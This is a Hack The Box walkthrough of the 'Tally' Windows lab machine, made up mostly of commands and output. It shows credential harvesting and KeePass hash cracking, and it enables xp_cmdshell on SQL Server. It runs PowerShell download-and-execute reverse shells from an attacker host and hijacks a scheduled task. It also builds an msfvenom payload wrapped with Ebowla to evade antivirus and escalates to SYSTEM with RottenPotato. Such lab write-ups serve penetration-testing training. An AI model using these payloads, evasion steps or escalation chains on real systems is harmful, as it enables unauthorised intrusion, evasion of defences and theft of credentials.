Tally - Hack The Box - Windows Hard

We come to find the machine is a sharepoint server.

We run a gobuster against the site.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $gobuster dir -u http://10.10.10.59/ -w /opt/SecLists/Discovery/Web-Content/CMS/sharepoint.txt -o gobuster.log
==================================================================================================================================

One fo the sites we probe is:
10.10.10.59/_layouts/viewlsts.aspx

Based on the output by visiting the site in question, we get two items 
Documents and Site Pages

We open links on both of those
http://10.10.10.59/Shared%20Documents/Forms/AllItems.aspx
http://10.10.10.59/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx

We get a file for Documents named ftp but non from the site pages webpage.

We open the docx file with xdg-open and get the following 
Commands and Output:
==================================================================================================================================
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
==================================================================================================================================


We update our hosts file with workgroup and hostname just in case. We don't have another username.
Also make sure to add tally to the hosts file using the corresponding IP address as this reveals more file info, than if only using
the IP itself.
http://tally/_layouts/15/start.aspx#/SitePages/FinanceTeam.aspx
Commands and Output:
==================================================================================================================================
Migration update
Hi all,

Welcome to your new team page!

As always, there's still a few finishing touches to make.  Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.

We'll also add the fund and client account pages in due course.

Thanks – Sarah & Tim.
==================================================================================================================================

So from here we get a couple of usernames we can use in conjunction with password we got from the sharepoint file.
Most likely ftp_user, and Rahul, Sarah, Tim.

We use the ftp_user we got from the sharepoint file and we login
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint]
└──╼ $ftp tally
Connected to tally.
220 Microsoft FTP Service
Name (tally:user): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-31-17  11:51PM       <DIR>          From-Custodian
10-01-17  11:37PM       <DIR>          Intranet
08-28-17  06:56PM       <DIR>          Logs
09-15-17  09:30PM       <DIR>          To-Upload
09-17-17  09:27PM       <DIR>          User
226 Transfer complete.

==================================================================================================================================


There is quite a number of files so we can use wget to recursively grab them as follows.
Commands and Output:
==================================================================================================================================
┌─[✗]─[user@parrot-virtual]─[~/htb/tally/sharepoint]
└──╼ $wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@tally.htb.local' 
..
..
..
<SNIP>
..
..
Total wall clock time: 3m 36s
Downloaded: 158 files, 98M in 2m 10s (773 KB/s)
==================================================================================================================================

We find a kind of good amount of directories downloaded and interestingly find an installer in the intranet folder for the firefox
application.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/tally.htb.local/Intranet/Binaries]
└──╼ $ls
'Firefox Setup 44.0.2.exe'
==================================================================================================================================

So we take note of that and continue looking for more interesting things. The interesting portion comes from the user directory
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/tally.htb.local/User]
└──╼ $find . -type f
./.listing
./Administrator/.listing
./Administrator/New folder/.listing
./Ekta/.listing
./Ekta/OFSI_quick_guide_flyer.pdf
./Ekta/PSAIS_1_April_2017.pdf
./Jess/.listing
./Jess/actu8-espreadsheet-designer-datasheet.pdf
./Paul/.listing
./Paul/financial-list-guide.pdf
./Paul/financial_sanctions_guidance_august_2017.pdf
./Paul/Monetary_penalties_for_breaches_of_financial_sanctions.pdf
./Paul/New folder/.listing
./Rahul/.listing
./Rahul/Mockups-Backup/.listing
./Sarah/.listing
./Sarah/MBSASetup-x64-EN.msi
./Sarah/notes.txt
./Sarah/Windows-KB890830-x64-V5.52.exe
./Stuart/.listing
./Stuart/customers - Copy.csv
./Stuart/Unit4-Connect-Financials-Agenda.pdf
./Tim/.listing
./Tim/Files/.listing
./Tim/Files/bonus.txt
./Tim/Files/tim.kdbx
./Tim/Files/KeePass-2.36/.listing
./Tim/Files/KeePass-2.36/KeePass.chm
./Tim/Files/KeePass-2.36/KeePass.exe
./Tim/Files/KeePass-2.36/KeePass.exe.config
./Tim/Files/KeePass-2.36/KeePass.XmlSerializers.dll
./Tim/Files/KeePass-2.36/KeePassLibC32.dll
./Tim/Files/KeePass-2.36/KeePassLibC64.dll
./Tim/Files/KeePass-2.36/License.txt
./Tim/Files/KeePass-2.36/ShInstUtil.exe
./Tim/Files/KeePass-2.36/Plugins/.listing
./Tim/Files/KeePass-2.36/XSL/.listing
./Tim/Files/KeePass-2.36/XSL/KDBX_Common.xsl
./Tim/Files/KeePass-2.36/XSL/KDBX_DetailsFull_HTML.xsl
./Tim/Files/KeePass-2.36/XSL/KDBX_DetailsLight_HTML.xsl
./Tim/Files/KeePass-2.36/XSL/KDBX_PasswordsOnly_TXT.xsl
./Tim/Files/KeePass-2.36/XSL/KDBX_Tabular_HTML.xsl
./Tim/Project/.listing
./Tim/Project/Communications/.listing
./Tim/Project/Log/.listing
./Tim/Project/Log/do to.txt
./Tim/Project/Vendors/.listing
./Yenwi/.listing
./Yenwi/Archive/.listing
==================================================================================================================================

The most eye catching files come from Tim's directory which point to a bunch of keePass files.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/tally.htb.local/User/Tim/Files]
└──╼ $file tim.kdbx 
tim.kdbx: Keepass password database 2.x KDBX
==================================================================================================================================

We indeed get a keepass database so we can do keepass2john to get a has formated file and do a dictionary attack to find the 
passphrase for the db.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/tally.htb.local/User/Tim/Files]
└──╼ $keepass2john tim.kdbx 
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
==================================================================================================================================

Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/keepass]
└──╼ $hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt --force
==================================================================================================================================

We do the cracking and find the password relatively fast
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/sharepoint/keepass]
└──╼ $hashcat -m 13400 hash.txt /usr/share/wordlists/rockyou.txt --force --show
$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da:simplementeyo
==================================================================================================================================

We can now install keepassx
Commands and Output:
==================================================================================================================================
┌─[✗]─[user@parrot-virtual]─[~/htb/tally]
└──╼ $sudo apt install keepassx
==================================================================================================================================

We can now open the keepassx application and enter the password simplementeyo
AND we are in. We find an interesting password in Shares>TALLY ACCT share > Edit Entry
Commands and Output:
==================================================================================================================================
Username: Finance
Pasword: Acc0unting
..
..
..

Username: cisco
Password: cisco123
==================================================================================================================================

We can now try mounting the Shares directry using the Finance account and password using mount command
Commands and Output:
==================================================================================================================================
┌─[✗]─[user@parrot-virtual]─[~/htb/tally]
└──╼ $sudo mount -t cifs  -o 'username=Finance,password=Acc0unting' //10.10.10.59/ACCT /mnt
┌─[✗]─[user@parrot-virtual]─[~/htb/tally]
└──╼ $cd /mnt/
┌─[user@parrot-virtual]─[/mnt]
└──╼ $ls
Customers  Fees  Invoices  Jess  Payroll  Reports  Tax  Transactions  zz_Archived  zz_Migration
==================================================================================================================================

We get more folders/files, we can copy all the file into a local folder to better examine with out lags.
we can look through all the files but after enumeration we come to look at the zz_migration folder and inside we take note of the 
'New folder' directory
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/smb/zz_Migration]
└──╼ $cd Binaries/
┌─[user@parrot-virtual]─[~/htb/tally/smb/zz_Migration/Binaries]
└──╼ $ls
 CardReader   FileZilla_Server-0_9_60_2.exe   NDP452-KB2901907-x86-x64-AllOS-ENU.exe  'New folder'   Sage50_2017.2.0.exe
==================================================================================================================================

We further inspect and find an interesting binary that maybe custom which is the tester.exe file we can from there do a quick 
analysis by running strings against the file.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/smb/zz_Migration/Binaries/New folder]
└──╼ $ls
crystal_reports_viewer_2016_sp04_51051980.zip  Orchard.Web.1.7.3.zip  RpprtSetup.exe                    tester.exe
Macabacus2016.exe                              putty.exe              tableau-desktop-32bit-10-3-2.exe  vcredist_x64.exe
┌─[user@parrot-virtual]─[~/htb/tally/smb/zz_Migration/Binaries/New folder]
└──╼ $strings tester.exe 
..
..
..
<SNIP>
..
..
WVU3
v	N+D$
WVS3
<$Xf
^_[3
SQLSTATE: 
Message: 
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad cast
bad locale name
false
true
generic
..
..
..

==================================================================================================================================

Eventually we find a string that contains a username uid "sa" and a pasword for the database orcharddb "GWE3V65#6KFH93@4GWTG2G"
We can now use these with sqsh to connect to the sql server.

If this were not a sa account, just a user account we could try something like powerup sql but would need windows and connect via vpn
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'whoami'
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the
security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more
information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
==================================================================================================================================

First thing we do once we connect with sa account is run the "xp_cmdshell" with go to see if we can run commands however it appears 
to be not the case. So we instead have to turn the feature on.
Commands and Output:
==================================================================================================================================
1>  EXEC SP_CONFIGURE 'xp_cmdshell ', 1
2> go
Msg 15123, Level 16, State 1
Server 'TALLY', Procedure 'sp_configure', Line 62
The configuration option 'xp_cmdshell ' does not exist, or it may be an advanced option.
(return status = 1)
==================================================================================================================================

However the configuration option does not exist. So we will have to enable them with advanced options. Follwoing the next steps.
Commands and Output:
==================================================================================================================================
1> EXEC SP_CONFIGURE 'show advanced options', 1
2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> reconfigure
2> go
1> EXEC SP_CONFIGURE 'xp_cmdshell', 1
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> reconfigure
2> go
1> xp_cmdshell 'whoami'
2> go
==================================================================================================================================

After running the go output, we should get the whoami, output as well
Commands and Output:
==================================================================================================================================
2> go

	output                                                                                                                            
----------------------------------------------------------------------------------------------------------

	tally\sarah                                                                                                                       

	NULL                                                                                                                              
==================================================================================================================================

We can now execute commands so the next steps is to get a reverse shell on the box. But before that we want to check if the SE
impersonate token is set so we can maybe exploit it later. This can be done with the following.
Commands and Output:
==================================================================================================================================
1>  xp_cmdshell 'whoami /priv'
2> go

	output                                                                                                                            

	PRIVILEGES INFORMATION                                                                                                            

	Privilege Name                Description                               State                                                     

	SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled                                                  

	SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled                                                  

	SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled                                                   

	SeImpersonatePrivilege        Impersonate a client after authentication Enabled                                                   

	SeCreateGlobalPrivilege       Create global objects                     Enabled                                                   
                                                                                                          

	SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled                                                  
==================================================================================================================================

It appears to be vulnerable. We now go to getting a shell on the box and will use nishangs repo to get a tcp one liner connection

Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[/opt/nishang/Shells]
└──╼ $cp Invoke-PowerShellTcp.ps1 ~/htb/tally/

..
..
..
## WE add the following line to the end of file to be executed
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 9001
==================================================================================================================================

All we need to do is set up simple http server on our end and have powershell execute the script while we listen on port 9001 for the
callback with netcat.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $mv Invoke-PowerShellTcp.ps1 rev.ps1
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $mkdir www
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $mv rev.ps1 www/
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $ls
gobuster.log  ls  nmap  notes.txt  sharepoint  smb  www
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $cd www/
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $ls
rev.ps1
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.59 - - [21/May/2021 21:38:42] "GET /rev.ps1 HTTP/1.1" 200 -
..
..
..


1> xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.18/rev.ps1')"
2> go

..
..
..

┌─[✗]─[user@parrot-virtual]─[~/htb/tally]
└──╼ $rlwrap nc -lnvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:50575.
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>

==================================================================================================================================

We now have a shell on the box, there are a few ways to privesc. We go to sarah's directory and find numerous files 
Commands and Output:
==================================================================================================================================
PS C:\users\sarah\Desktop> dir


    Directory: C:\users\sarah\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       01/10/2017     22:32            916 browser.bat                                                           
-a----       17/09/2017     21:50            845 FTP.lnk                                                               
-a----       23/09/2017     21:11            297 note to tim (draft).txt                                               
-a----       19/10/2017     21:49          17152 SPBestWarmUp.ps1                                                      
-a----       19/10/2017     22:48          11010 SPBestWarmUp.xml                                                      
-a----       17/09/2017     21:48           1914 SQLCMD.lnk                                                            
-a----       21/09/2017     00:46            129 todo.txt                                                              
-ar---       31/08/2017     02:04             32 user.txt                                                              
-a----       17/09/2017     21:49            936 zz_Migration.lnk
==================================================================================================================================

One in particluar is the browser.bat file, but nothng too interesting. We read the note and it states the following.
Commands and Output:
==================================================================================================================================
PS C:\users\sarah\Desktop> get-content "note to tim (draft).txt"
Hi Tim,

As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.

Thanks,
Sarah
==================================================================================================================================

Cmd is prevented from running outside the windows folder, only works in c:\windows. We check other files and one that rbings an 
interesting task is the SPBestWarmUp.xml which runs apparently every hour
Commands and Output:
==================================================================================================================================
PS C:\users\sarah\Desktop> get-content SPBestWarmUp.xml
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition>
        <Interval>PT1H</Interval>
        <Duration>P1D</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-01-25T01:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
..
..
<snip>
..
..
    <Principal id="Author">
      <UserId>TALLY\Administrator</UserId>
      <LogonType>Password</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>PowerShell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
      <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>
==================================================================================================================================

Looks like it is being run by the administator as a scheduled task. The ps1 file can be written to so we can create a rev shell 
and wait for execution to perhaps become the administrator user.

So we can just echo powershell command to downlad and execute the nishang reverse shell payload.
Commands and Output:
==================================================================================================================================
PS C:\users\sarah\Desktop> echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.18/rev-9002.ps1')" > SPBestWarmUp.ps1
PS C:\users\sarah\Desktop> get-content SPBestWarmUp.ps1
IEX(New-Object Net.webClient).DownloadString('http://10.10.14.18/rev-9002.ps1')
..
..
..
┌─[user@parrot-virtual]─[~/htb/tally]
└──╼ $nc -lnvp 9002
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002

==================================================================================================================================

We can wait to see if we get a reverse shell, in the mean time look for other ways to get admin.
We can now get a privilege escalation tool such powerup to see if there are any things that could be exploited.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
..
..
..
PS C:\users\sarah\Desktop> IEX(New-Object Net.webClient).DownloadString('http://10.10.14.18/PowerUp.ps1')
PS C:\users\sarah\Desktop> invoke-allchecks
==================================================================================================================================

And we wait for output to comeback. We get the following
Commands and Output:
==================================================================================================================================
PS C:\users\sarah\Desktop> invoke-allchecks


Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2468
ProcessId   : 8052
Name        : 8052
Check       : Process Token Privileges

ServiceName    : c2wts
Path           : C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'c2wts' -Path <HijackPath>
CanRestart     : False
Name           : c2wts
Check          : Unquoted Service Paths

ServiceName    : c2wts
Path           : C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'c2wts' -Path <HijackPath>
CanRestart     : False
Name           : c2wts
Check          : Unquoted Service Paths

ModifiablePath    : C:\Users\Sarah\AppData\Local\Microsoft\WindowsApps
IdentityReference : TALLY\Sarah
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Sarah\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Sarah\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Sarah\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

DefaultDomainName    : 
DefaultUserName      : sarah
DefaultPassword      : mylongandstrongp4ssword!
AltDefaultDomainName : 
AltDefaultUserName   : 
AltDefaultPassword   : 
Check                : Registry Autologons

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files
==================================================================================================================================

We have potential dll hijacking, unquoted service paths which will require a reboot. SEImpersonate token is enabled.
Jeeves; Foxglove security SE Impersonate.
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

We will use rotten potatoe, decoders version of rotten potatoe since we don't want to use metasploit. 
We can also use rotten potatoeng

The website for decoder is https://decoder.cloud
https://decoder.cloud/2018/01/13/potato-and-tokens/

We can grab a clone of decoders work from the following github
https://github.com/christiancoleman/lonelypotato.git
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/lonelypotato/RottenPotatoEXE/x64/Release]
└──╼ $file MSFRottenPotato.exe 
MSFRottenPotato.exe: PE32+ executable (console) x86-64, for MS Windows
┌─[user@parrot-virtual]─[~/htb/tally/lonelypotato/RottenPotatoEXE/x64/Release]
└──╼ $cp MSFRottenPotato.exe ../../../../www/lonelypotato.exe
==================================================================================================================================

One more thing we can use is ebowla to evade anti virus. We can clone this to our /opt directory.
Ebowla encrypts the payload of your executable with environment variables.

Ebowla ensures that the paylaod executable can only be executed in the target machie keeping things in scope.
Commands and Output:
==================================================================================================================================
sudo git clone https://github.com/Genetic-Malware/Ebowla.git
==================================================================================================================================

We can modify the variables in the genetic.config file
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $sudo vim genetic.config 
..
..
..
    [[ENV_VAR]]
    
        username = ''
        computername = 'TALLY'
        homepath = ''
        homedrive = ''
        Number_of_processors = ''
        processor_identifier = ''
        processor_revision = ''
        userdomain = ''
        systemdrive = ''
        userprofile = ''
        path = ''
        temp = ''
..
..
..
==================================================================================================================================

Since ebowla can only run using python2 we will need to install some legacy software such as pycryptodome, pyparsing, and configobj
First we download version of pip for python2
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~]
└──╼ $wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
┌─[user@parrot-virtual]─[~]
└──╼ $sudo python2.7 get-pip.py
┌─[user@parrot-virtual]─[~]
└──╼ $which pip2.7
/usr/local/bin/pip2.7
┌─[✗]─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $pip2.7 install configobj
┌─[✗]─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $pip2.7 install pycryptodome
┌─[✗]─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $pip2.7 install pyparsing
┌─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $python2 ebowla.py 
Usage: ebowla.py input_file_to_encode config
==================================================================================================================================

Now we should be able to run ebowla but first we need to make a msfvenom payload for windows.
Commands and Output:
==================================================================================================================================
┌─[✗]─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=9004 -f exe -a x64 -o shell-9004.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell-9004.exe
==================================================================================================================================

We now run ebowla using the newly created staged payload and specify the genetic config file.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $python2.7 /opt/Ebowla/ebowla.py shell-9004.exe /opt/Ebowla/genetic.config 
[*] Using Symmetric encryption
[*] Payload length 7168
[*] Payload_type exe
[*] Using EXE payload template
[*] Used environment variables:
	[-] environment value used: computername, value used: tally
[!] Path string not used as pasrt of key
[!] External IP mask NOT used as part of key
[!] System time mask NOT used as part of key
[*] String used to source the encryption key: tally
[*] Applying 10000 sha512 hash iterations before encryption
[*] Encryption key: 10ec761385e793a40f42f7906556ed3b159453df06bab23256c48f3b90de4834
[*] Writing GO payload to: go_symmetric_shell-9004.exe.go
==================================================================================================================================

Now we see an output file containing the go exe file
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $ls
lonelypotato.exe  output  PowerUp.ps1  rev-9002.ps1  rev.ps1  shell-9004.exe
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $cd output/
┌─[user@parrot-virtual]─[~/htb/tally/www/output]
└──╼ $ls
go_symmetric_shell-9004.exe.go
==================================================================================================================================

We still need to install more tools unto our system to be able to run the gcc that create windows executables
Commands and Output:
==================================================================================================================================
sudo apt install binutils-mingw-w64
sudo apt install gcc-mingw-w64-x86-64
==================================================================================================================================

We can now run the sh script and have it build the custom reverse shell.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[/opt/Ebowla]
└──╼ $sudo ./build_x64_go.sh output/go_symmetric_shell-9004.exe.go ebowla-shell-9004.exe
[*] Copy Files to tmp for building
[*] Building...
[*] Building complete
[*] Copy ebowla-shell-9004.exe to output
[*] Cleaning up
[*] Done
┌─[user@parrot-virtual]─[/opt/Ebowla/output]
└──╼ $cp ebowla-shell-9004.exe ~/htb/tally/www/
┌─[user@parrot-virtual]─[/opt/Ebowla/output]
└──╼ $cd !$
cd ~/htb/tally/www/
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $file ebowla-shell-9004.exe 
ebowla-shell-9004.exe: PE32+ executable (console) x86-64, for MS Windows
==================================================================================================================================

After uploading the executable to VirusToTal we see that the ebowla exe was only picked up by 18 vendors of which run dynmaic 
analysis, while the normal executable by meterpreter with no AV evasion was picked by 50 vendors showcasing the power of the ebowla
anti-av.

Now we have to figure out a way to upload the files to the server and luckily we have ftp to upload the files. We can use the 
ftp_user and upload them to the intranet folder.
Commands and Output:
==================================================================================================================================
┌─[user@parrot-virtual]─[~/htb/tally/www]
└──╼ $ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:user): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd Intranet
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> put lonelypotato.exe
local: lonelypotato.exe remote: lonelypotato.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
334336 bytes sent in 0.74 secs (443.6726 kB/s)
ftp> put ebowla-shell-9004.exe
local: ebowla-shell-9004.exe remote: ebowla-shell-9004.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
4301882 bytes sent in 2.74 secs (1.4954 MB/s)

==================================================================================================================================

Commands and Output:
==================================================================================================================================
PS C:\users> cd c:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       18/09/2017     06:58                ACCT                                                                  
d-----       18/09/2017     21:35                FTP                                                                   
d-----       18/09/2017     22:35                inetpub                                                               
d-----       16/07/2016     14:23                PerfLogs                                                              
d-----       24/12/2017     01:46                Program Files                                                         
d-----       19/10/2017     23:09                Program Files (x86)                                                   
d-----       01/10/2017     20:46                TEMP                                                                  
d-r---       12/10/2017     21:28                Users                                                                 
d-----       23/10/2017     21:44                Windows                                                               


PS C:\> cd FTP
PS C:\FTP> dir


    Directory: C:\FTP


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       31/08/2017     23:51                From-Custodian                                                        
d-----       22/05/2021     10:17                Intranet                                                              
d-----       28/08/2017     18:56                Logs                                                                  
d-----       15/09/2017     21:30                To-Upload                                                             
d-----       17/09/2017     21:27                User                                                                  


PS C:\FTP> cd Intranet
PS C:\FTP\Intranet> dir


    Directory: C:\FTP\Intranet


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       11/09/2017     22:25                Binaries                                                              
-a----       22/05/2021     10:17        4301882 ebowla-shell-9004.exe                                                 
-a----       22/05/2021     10:17         334336 lonelypotato.exe
==================================================================================================================================

Now we can run lonelypotato and get a system shell.
Commands and Output:
==================================================================================================================================
PS C:\FTP\Intranet> C:\FTP\Intranet\lonelypotato.exe * C:\FTP\Intranet\ebowla-shell-9004.exe
connect sock
start RPC  connection
CreateIlok: 0 0
CreateDoc: 0 0
COM -> bytes received: 116
RPC -> bytes Sent: 116
RPC -> bytes received: 84
COM -> bytes sent: 84
COM -> bytes received: 24
RPC -> bytes Sent: 24
RPC -> bytes received: 200
COM -> bytes sent: 200
COM -> bytes received: 134
RPC -> bytes Sent: 134
RPC -> bytes received: 206
COM -> bytes sent: 206
COM -> bytes received: 250
RPC -> bytes Sent: 250
RPC -> bytes received: 202
COM -> bytes sent: 202
COM -> bytes received: 72
RPC -> bytes Sent: 72
RPC -> bytes received: 60
COM -> bytes sent: 60
COM -> bytes received: 42
RPC -> bytes Sent: 42
RPC -> bytes received: 56
COM -> bytes sent: 56
CoGet: -2147022986 0
[+] authresult != -1
[+] Elevated Token type:2
Session of Elevated Token: 0
[+] DuplicateTokenEx :1  0
[+] Duped Token type:1
[+] Running C:\FTP\Intranet\ebowla-shell-9004.exe sessionId 1 
[+] CreateProcessWithTokenW OK
